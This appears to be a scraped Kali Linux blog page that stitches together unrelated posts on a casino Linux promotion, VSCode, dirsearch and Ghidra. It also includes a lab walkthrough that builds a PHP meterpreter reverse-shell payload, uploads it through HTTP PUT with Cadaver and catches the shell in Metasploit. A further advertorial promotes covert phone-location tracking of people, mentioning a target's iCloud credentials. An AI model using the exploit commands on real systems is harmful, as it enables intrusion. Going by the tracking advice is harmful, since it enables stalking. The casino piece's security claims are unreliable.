                          You would be surprised to know that Linux provides higher security when compared to operating systems giants such as Windows. The reason behind this statement is Linux is an open-sourceoperating system. Therefore, many whitehat hackers or ethical hackers have provided various security features. This article will shed light upon the usage of Linux for an online casino in India and how top online casinos are moving towards Linux for better server security.

                          Benefits of using Linux server for online casinos in India

                          Though Linux has been there for ages, it was unknown to many people till now. It was only under the central hub of developers until online casinos in India found it beneficial. Linux servers have various great features as compared to other operating systems. Below are the advantages that an online casino get by using a Linux server for hosting their games:

                          Zero or Low Cost

                          Since Linux is an open-source operating system, any online casinos in India can get it for almost zero rupees. Similarly, an online casino has to incur heavy expenses when they choose another operating system. Well, you might be thinking that with every free commodity or service, there comes a terms and conditions page. 

                          Linux Mint on Kali

                          However, with Linux, a casino doesn’t have to pay anything and even worry about terms and conditions as it is available for free. The Linux source code also allows a casino to use or alter it for commercial purposes. Even a person can easily install Linux as an operating system into their PCs for zero money.

                          A casino can find Linux more secure by design

                          Many developers who work for building many online casinos in India believe that Linux is more secure than any other operating system. Many surveys have claimed that Linux handles its user permissions better than any other operating system. There are various design security principles that Linux adheres to, and prolifically, it happens by default. 

                          It is not complex to use

                          There is a common notion or myth circulated amongst people and even businesses that Linux is tough to use. Though it is for free, businesses restrain themselves from using Linux because they feel it is not user-friendly or more complicated. Another reason is that the companies are used to commonly used operating systems, and hence, it becomes a bit complex to shift to Linux. 

                          However, Linux isn’t at all complicated to use. It is pretty user-friendly as well. A user or a player can run their .exe files in Linux using WINE. And not just online casinos, India’s top casino review website, casinofox.inalso runs on a linux server.

                          Stress-free updates

                          All the software updates in Linux are always hassle-free because all of the updates from Linux are in patches. In simple terms, a person isn’t required to restart their system to cater to those updates. We all know that these updates consume a lot of time and when the reboot option comes, it disappoints many people and developers, especially when they’re building new casino features. 

                          Community support

                          It is beneficial from the developers’ end because they don’t remain alone when they develop a new casino site or update it. They get the hands and expertise of the community members who use Linux for their business use.

                          It secures customers’ data

                          Most of the viruses are developed, keeping in mind the Windows’outlook. However, Linux operating systems have very few viruses that can attack a customer’s data. This is due to the fact that in Linux, a person doesn’t require antiviruses. Installing the antivirus in Windows also results in slow performance – which is a plus point with Linux.

                          It is legal for any casino to choose Linux

                          Linux issues the license for free and for commercial usage. Hence, using Linux for any online casino in India is as legal as placing a bet at horse racing. Whereas, in Windows, if the key comes out to be invalid, then a casino server built upon Windows may face legal consequences or implications. Nothing of this sort ever happens in Linux, as it is very secure and legal.

                          Diversity with different Linux flavors

                          Though there has been a monoculture of Windows and no other operating system got the same opportunity as Windows, it becomes crucial that the industry thinks about alternatives. Like agriculture, one can not have the same yields and harvests every time as it harms nature and soil. In development and engineering, a business should explore different ways to get the utmost security at an affordable price. Also, Linux offers various flavors to choose from!

                          Final Words

                          Online casinos in India are on the rise, the same as cryptocurrencies like bitcoin are. Every 2 in 5 persons gamble once a year, and hence, it becomes essential for a casino to build its most substantial server with advanced security features. There is no better option than Linux for an online casino based out either in India or abroad.

                          How to Install VSCode on Kali Linux

                          How to Install VSCode on Kali Linux

                          There are so many code editors in the market, but now many developers found liking Virtual Studio Code. In this community we have seen many of friends switched on Virtual Studio Code (VSCode) from Atom and Sublime Text.

                          how to install vscode on kali linux

                          VSCode is an awesome code editor, it’s totally free also. In this brief tutorial we are going to install VSCode on our Kali Linux system.

                          Installing VSCode on Kali Linux

                          Before June 2021 we need to download the source-code of VSCode but now Kali Linux added VSCode on the repository.

                          We need to run one single command “sudo apt install code-oss” to install VSCode on our Kali Linux system. Code-oss is an open-source fork of VSCode without any proprietary code.

                          We run the following command on our terminal:

                          sudo apt install code-oss -y

                          It will start installing Virtual Studio Code on our Kali Linux after providing our root password, as we can see on the following screenshot.

                          installing vscode on kali linux

                          It will download nearly 75 MB archives and take nearly 270MB disk space. So the installation time will depend on our internet speed and system performance.

                          Using VSCode on Kali Linux

                          After the process complete we can see code-oss aka VSCode on our application menu.

                          vscode on kali linux

                          We can click here to open it. Alternatively we can run code-oss command from our terminal to open it.

                          code-oss

                          The welcome screen will be in front of us as we can see in the following screenshot.

                          running vscode on kali linux

                          Now our coding will be hassle free with our favorite code editor.

                          vscode on kali linux gif

                          This is the most easiest way to install Virtual Studio Code aka VSCode aka code-oss on Kali Linux. If enjoyed the article make sure to comment on following comment section, that encourage us.

                          Love our articles? Make sure to follow us on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

                          How to Locate a Person’s Home or Cell Phone Number for Free

                          How to Locate a Person’s Home or Cell Phone Number for Free

                          The advancements that we see now in the world of today are highly ferocious and can be detrimental if they are used without any measure or extent of their usage. The most primary device that can be enlisted for the perils it possesses is the mobile phone.

                          The mobile phone can be deemed as a necessary evil of today’s world as there are a lot of functions as well as dangers associated with the little device on your palm. The mobile phone can be subjected to a lot of things that can prove dangerous for you in the long run.

                          Photo by Mael BALLAND on Unsplash

                          However, if you want to check on a person and acquire whether the person you are in contact with on a daily basis is a genuine contact or not. There are a lot of things that can help identify several details of the owner of the phone.

                          Here is what you need if you want the information about the person from the cell phone:

                          CocoFinder: Track Someone Easily Without Letting Anyone Know

                          CocoFinder is a unique tool that has been created for the purpose of finding out the details of a person with the help of a mobile number. You can also check out someone’s location with the help of CocoFinder and enjoy all of these privileges for a detailed debrief.
                          cocofinder homepage
                          CocoFinder is a highly recognized brand that can be used for a lot of purposes and can be employed in several tasks to ensure that the details given are accurate as well as trust-able. You can get into the details of the person you want via CocoFinder and enjoy all of the privileges it provides to the users.

                          Enter a Phone Number to Track It Down

                          t’s as simple as typing in someone’s phone number and tracking their phone to find out where they are. CocoFinder is an internet cell phone monitoring service that allows you to trace the position of anyone’s phone in real time.

                          It’s a hidden phone location tracker that only requires the phone number to track the user’s position. CocoFinder can show you the person’s present address, their office location, read more about tracking someone’s phone, and even their previous addresses when it comes to location.

                          cocofinder reverse phone lookup

                          There are various more parameters that can be used to locate a phone number. It’s possible that you won’t even need someone’s phone number to figure out where they are.

                          The entire interface is in the form of a search engine and is accessible via CocoFinder’s website. There are several parameters to use while looking for someone’s location, including:

                          Phone Number

                          This is an excellent approach to track down a questionable missed caller or someone you used to know. When you enter a phone number, it displays the owner of the number as well as their location.

                          Name

                          CocoFinder also allows you to look up someone’s location by their name. Simply search for the person by entering their first and last name. CocoFinder will return all of the search results that are relevant to the question.

                          Email address

                          A person’s social media profiles can be found by searching for their email address. Other information associated with the email address, such as the user’s phone number, is also available.

                          Postal Code

                          CocoFinder also allows you to look for someone by their address. When looking up someone’s phone location using their phone number, though, their address may not be something you already know.

                          What Is The Use Of CocoFinder?

                          CocoFinder is a tough and reliable instrument that gives you unique and accurate information on the target and determines whether or not the individual can be trusted. CocoFinder is still the most popular option for everyone who wants to keep their secrets hidden.

                          CocoFinder is a well-known brand since it has attracted a significant number of fans and active users who rely on it as a first line of defence in their quest for information.

                          CocoFinder laces you with specific and trustable details that make it easy for you to check out the authenticity of the person you are spying on and whether to trust them or not. Here are a few things that are proudly presented by CocoFinder to ensure secrecy as well as brilliance in the field.

                          How Does CocoFinder Track a Location?

                          CocoFinder can locate any Android phone with the same ease as it can an iPhone. The only thing you’ll need is the target iPhone’s iCloud credentials, and you’ll be ready to go. Follow the steps below to track an Android location using its number:

                          Step 1: Go to CocoFinder’s main page and select the “Reverse Phone Lookup” option.

                          Step 2: Enter the target phone’s phone number.

                          Step 3: Select the ‘Search’ option from the drop-down menu.

                          Step 4: CocoFinder will search its databases for information about the owner of the phone number. You may find out where they are located by clicking here.

                          Why Only CocoFinder:

                          CocoFinder is a brilliant tool with a multitude of countries using this as a primary line of defence against persons that are unworthy of trust. Here are a few features that make it one of its kind in the race:

                          • Ultimate security with the guarantee of protection from the third party.
                          • Low-cost procedures and effective results which guarantee accuracy.
                          • Brilliant features that aid in the search.
                          • Security of your database as all of your data is deleted soon after you quit the site.

                          Conclusion:

                          CocoFinder is a brilliant tool that needs to be used at all costs to avoid uncertainty and to make sure that you as well as your loved ones are safe from any danger that can come from the usage of social media or mobile phones.

                          CocoFinder is a maestro when it comes to tracking down targets.

                          Cadaver – Exploit HTTP PUT Vulnerability

                          Cadaver – Exploit HTTP PUT Vulnerability

                          Cadaver is a command line WebDAV client for UNIX. It supports uploading and downloading of a file on WebDAV. Cadaver comes pre-installed with Kali Linux. We can upload web shells also on a vulnerable system using HTTP PUT method.

                          Cadaver on Kali Linux to exploit http put vulnerability

                          What is HTTP PUT method?

                          PUT method originally introduced as one of the HTTP method to be used for file management works. The problem is if the HTTP PUT method is enabled on a web-server then it can be used to upload a malicious elements to the target server, thinking about a web shell?

                          How to check for HTTP PUT vulnerability?

                          To confirm that a target system has HTTP PUT method allowed us to upload malicious shells we can scan our target using Nikto. Here for an example we have Metasploitable 2 running.

                          running metasploitable2

                          We scan this vulnerable web server with Nikto by using following command:

                          nikto -h http://172.17.0.2/dav/

                          On the following screenshot we can see that this vulnerable web application allow us to save files on web server via HTTP PUT method:

                          vulnerable web application allow us to save files on web server via HTTP PUT method
                          Web application allow to save files on web server via HTTP PUT method

                          Now we need a web shell to upload here. We can use msfvenom or any other method. For msfvenom we need to run following command to create a web shell.

                          msfvenom -p php/meterpreter/reverse_tcp lhost=172.17.0.1 lport=4444 -f raw

                          Here the lhost is our attacker system IP address (172.17.0.1 in our case). After running the msfvenom command the RAW backdoor will be created, as we can see in the following screenshot:

                          RAW php web shell

                          Now we can create a shell.php (any name with .php file extension) and paste the highlighted payload/shell there. Now it’s ready to upload.

                          Upload Web Shell using Cadaver

                          As we said earlier Cadaver is a command line tool pre-installed in the Kali machine that enables the uploading and downloading of a file on WebDAV. Firstly, we need to specify our target using Cadaver by using following command:

                          cadaver http://172.17.0.2/dav/

                          Then we need to put our web shell php file by using following command:

                          put /home/kali/testshell.php

                          On the following screenshot we can see that we have successfully uploaded our web shell on our target web server.

                          cadaver uploaded shell on web

                          Now if we refresh our target website we can see that cadaver uploaded web shell to this server.

                          cadaver uploaded web payload on the server

                          Now we can easily exploit it by using msfconsole. We need to run msfconsole command on our terminal to open Metasploit Framework Console.

                          msfconsole

                          After opening msfconsole we set our handler, set payload, set lhost (attacker ip), set lport and exploit it by using following commands one by one.

                          use exploit/multi/handler
                          set payload php/meterpreter/reverse_tcp
                          set lhost 172.17.0.1
                          set lport 4444
                          exploit

                          Then our reverse tcp handler will started. We now need to click on our payload on the website.

                          just a click to exploit

                          BINGO !! WE GOT reverse SHELL.

                          Got shell

                          This is how we can exploit HTTP PUT vulnerability using Cadaver using our Kali Linux system.

                          invincibale gif funny

                          How to be Safe From HTTP PUT Vulnerability?

                          This method is used to change or delete the files from the target server’s file system. It is also higher risks on various file uploading vulnerabilities, and this vulnerability will lead various dangerous cyber attacks. To make servers more secure we suggest the file access permissions of the organizations secure servers should be limited with restricted access to authorized, if the organization are going to use HTTP PUT method.

                          Love our articles? Make sure to follow us on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

                          DirSearch — Rapid Web Path Scanner

                          DirSearch — Rapid Web Path Scanner

                          We are covering dirsearch tutorial in this post. it’s a simple command-line python based website directory/path scanner which can brute-force any targeted site for it’s directory and files. This is very common job in pentesting and dirsearch do this job much faster then the traditional DIRB. It is a mush have tool in our Kali Linux machine.

                          dirsearch Kali Linux 2021

                          Now with Kali Linux 2021.2 DirSearch comes pre-installed with kali-linux-full image or we can download it by applying following command:

                          sudo apt install dirsearch -y

                          installing dirsearch on Kali Linux

                          After installing it, we can check the help options of dirsearch by using following command:

                          dirsearch -h

                          The above command will show us the help menu of dirsearch as we can see on the following screenshot:
                           

                          dirsearch help

                          Now it’s time to use dirsearch. For an example we assume that google.com is our target and we need to check it’s directory and files. We use following command:

                          dirsearch -u google.com -e aspx,php
                          Here we look for only php and aspx files, and we have specified our target URL using -u flag.
                          After running the above command we can see that dirsearch started it’s work as we can see on the following screenshot:

                          dirsearch working

                          Time to scan is depending on our target website’s size. When it finished, we can see a “Task Completed” message on our terminal, as we can see in the following screenshot:

                          dirsearch task completed

                          On the above screenshot we can see that dirsearch searched for tons of paths and directories on our target website. We might get suspicious or sensitive page from here, but a good bounty hunter or pen tester will gather more information about every location or manually check everything.
                          Vulnerabilities can be anywhere.
                          Dirsearch also save the generated output file on a text format (plain, json, xml, md, csv), default format is txt. We can see the path of saved output on the upper side (need to scroll up) of terminal, shown on the following screenshot:

                          dirsearch output file location

                          This is how we can search for hidden and sensitive directories using dirsearch on our Kali Linux system. Dirseach is faster then infamous tool DIRB.Love our articles? Make sure to follow us to get all our articles directly on notification. We are also available on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

                          Ghidra — Reverse Engineering Tool used by NSA

                          Ghidra — Reverse Engineering Tool used by NSA

                          On Kali Linux’s latest 2021.2 update Kali Linux included Ghidra on Kali Linux large image and repository, means now it’s more easier to install and use Ghidra on our Kali Linux system. But, what is Ghidra? A dragon?

                          What is Ghidra ?

                          Ghidra is an open-source software reverse engineering (SRE) framework developed by National Security Agency (NSA) Research Directorate of United States, for NSA’s Cyberseurity mission.

                          The binaries were released at RSA Conference in March 2019; the sources were published one month later on GitHub. Ghidra is seen by many security researchers as a competitor to IDA Pro. The software is written in Java using the Swing framework for the GUI. The decompiler component is written in C++. Ghidra plugins can be developed in Java or in Python (provided via Jython).

                          It is a Java based GUI reverse engineering framework, it is able to de-compile a application from binary and understand the logic of the code. NSA used it to find malwares inside a application, it also very useful for finding bugs on applications.

                          How to Install Ghidra on Kali Linux 2021

                          Ghidra on Kali Linux install and use

                          If we wrote this article before Ghidra comes with Kali (June, 2021, then the installation process will be larger and complex.

                          But now we just need one command to install it on our Kali Linux system. We need to use following command:

                          sudo apt install -y ghidra

                          The above command will install Ghidra on our Kali Linux system. It will download more than 250 MB and take almost 750 MB disk space on our system. So installing it will consume some time depending on our network speed and system configuration. Coffee Break ?.

                          Ghidra installation on Kali Linux

                          How to use Ghidra on Kali Linux

                          After installing Ghidra on our Kali Linux system we can open this GUI based tool by using following command to open it up:

                          ghidra

                          The above command will open Ghidra on our Kali Linux system, or we can search for it on Application menu. As we can see on the following screenshot:

                          Ghidra User agreement

                          Here Ghidra is showing us the “User agreement” to use this tool. We need to read it carefully then click on “I agree” for the very first time of using Ghidra.

                          After clicking on ‘I agree’ Ghidra will open two window, one for help another is the Ghidra framework’s main screen, we can check the help if we want, but here we close it and focus on Ghidra. It looks like the following screenshot:

                          ghidra main screen

                          Here we can see that we don’t have any active project on our Ghidra. So we need to import a project. We have an exe file here to test. First of all we need to go to  the menu File>New Project, as shown in the following screenshot.

                          Ghidra new project

                          Then we need to select our new project type, here we are choosing non-shared project.

                          project type on ghidra

                          We click on “Next”, now we need to select the project location and name. We have chosen the default home path and named the project as we wish, see the following screenshot below.

                          ghidra project name and location

                          Then we click on “Finish”, to complete creating a new project.

                          New project on ghidra created

                          On the above screenshot we can see that a new project created on Ghidra.

                          Now here we can import an application file. For an example we have an exe file. We can directly drag & drop the application file over the project or we can simply press I to import application file for testing, We can also choose from menu File>Import File.

                          Then we need to choose application file to test as shown in the following screenshot:

                          ghidra import application file

                          Here we have choose an shell.exe file for testing. We select it to import.

                          import file summary on ghidra

                          We can see some details of importing file, we click on “OK“.

                          import file summary on ghidra

                          Here in this window we can see the import file summary on Ghidra. We press ‘Enter‘ ↩ key here.

                          Now Ghidra will import the file and prompt to analyze the application file on CodeBrowser.

                          Ghidra prompt for analysis

                          We click on “Yes“. Then on a new window we need to select analyzers. There are lots of analysis configuration options do exist. We can see a description of every option by clicking on it, the description is displayed in the upper-right Description section.

                          Analysis options on Ghidra

                          Let’s click on Analyze to perform the analysis of the file. Then, we can see the Ghidra CodeBrowser window. We shouldn’t worry if we forget to analyze something, we can reanalyze the program later (by going to the Analysis tab and then Auto Analyze ‘shell.exe’).

                          analysis again on ghidra

                          Ghidra CodeBrowser

                          Here we are in Ghidra CodeBrowser. From here we can analysis application data and logic. Ghidra CodeBrowser has a good and well-chosen interface. Let’s briefly know about it.

                          Ghidra codebrowser details

                          Let’s see how CodeBrowser is distributed by default:

                          1. Usually, by default in reverse engineering frameworks, in the center of the screen, Ghidra shows a disassembly view of the application file.
                          2. As the disassembly level is sometimes a too low-level perspective, Ghidra incorporates its own de-compiler, which is located to the right of the disassembly window. The main function of the program was recognized by a Ghidra signature, and then parameters were automatically generated. Ghidra also allow us to manipulate de-compiled code in a lot of aspects. Of course, a hexadecimal view of the file is also available in the corresponding tab. These three windows (disassembly, de-compiler, and the hexadecimal window) are synchronized, offering different perspectives of the same thing.
                          3. Ghidra also allow us to easily navigate in the program. For instance, to go to another program section, we can refer to the Program Trees window located in the upper-left margin of CodeBrowser.
                          4. If we prefer to navigate to a symbol (for example, a program function), then we need to go just below that, to where the Symbols Tree pane is located.
                          5. If we want to work with data types, then we need to go just below that again, to Data Type Manager.
                          6. As Ghidra allows scripting reverse engineering tasks, script results are shown in the corresponding window at the bottom. Of-course, the Bookmarks tab is available in the same position, allowing us to create pretty well-documented and organized bookmarks of any memory location for quick access.
                          7. Ghidra has also a quick access bar at the top.
                          8. At the topmost part of CodeBrowser, the main bar is located. Now we know the default perspective of Ghidra.
                          9. Following the current address, the current function is shown.
                          10. In addition to the current address and the current function, the current disassembly line is shown to complete the contextual information.
                          11. Finally, at the bottom right, the first field indicates the current address.

                          Ghidra is highly customizable framework. It has tons of features and also we can run our own scripts on it. Covering every details of Ghidra is not possible on an article. Ghidra is a huge topic we must need an entire book to learn it clearly.

                          What just we said? A BOOK? We have it. We have a very good book on Ghidra, which one covers Ghidra in total. Check our Telegram Group to get the book. Here is the Ghidra official Cheat Sheet.

                          Love our articles? Make sure to follow us to get all our articles directly on notification. We are also available on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

                          Open Whatsapp chat
                          Whatsapp Us
                          Chat with us for faster replies.